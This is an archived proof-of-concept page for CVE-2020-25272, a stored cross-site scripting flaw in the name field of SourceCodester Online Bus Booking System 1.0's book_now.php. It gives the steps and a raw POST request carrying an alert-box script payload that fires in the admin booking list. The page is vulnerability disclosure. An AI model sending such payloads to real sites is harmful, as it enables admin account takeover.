CVE-2020-25272 PoC — SourceCodester Online Bus Booking System 跨站脚本漏洞

Source

https://github.com/Ko-kn3t/CVE-2020-25272

Associated Vulnerability

Title:SourceCodester Online Bus Booking System 跨站脚本漏洞 (CVE-2020-25272)
Description:SourceCodester Online Bus Booking System是个人开发者的一个在线公共汽车预定系统。该系统可以帮助公共汽车公司管理预定和售票流程。 SourceCodester Online Bus Booking System 1.0版本存在跨站脚本漏洞，该漏洞源于book_now.php。

Description

Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php

Readme

# CVE-2020-25272

#Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php

#Vendor - SourceCodester

#Product - https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Vulnerability Type - Cross Site Scripting (XSS)

#Addition Information - Single XSS payload will trigger in all Dashboard, so account take over will be occurred.

#Affected Component - /bus_booking/book_now.php , /bus_booking/index.php?page=booked

#Attack Type- Local

#Privilege Escalation - true

#Impact Code execution - true

***Attack Vector***

> 1) Go to book_now.php and book bus ticket
>
>
> 2) In name field , set malicious XSS payload
>
> POST /bus_booking/book_now.php HTTP/1.1
>
> Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
>
>.....
>
> sid=2&bid=&name=<script>alert('XSS');</script>&qty=1
>
>
> 3) In Admin site, go to booked list, and stored XSS will be triggered
>

File Snapshot


 [4.0K]  /data/pocs/db2bec7da11be75604a305b2c162c7273b0ffb95
└── [ 939]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!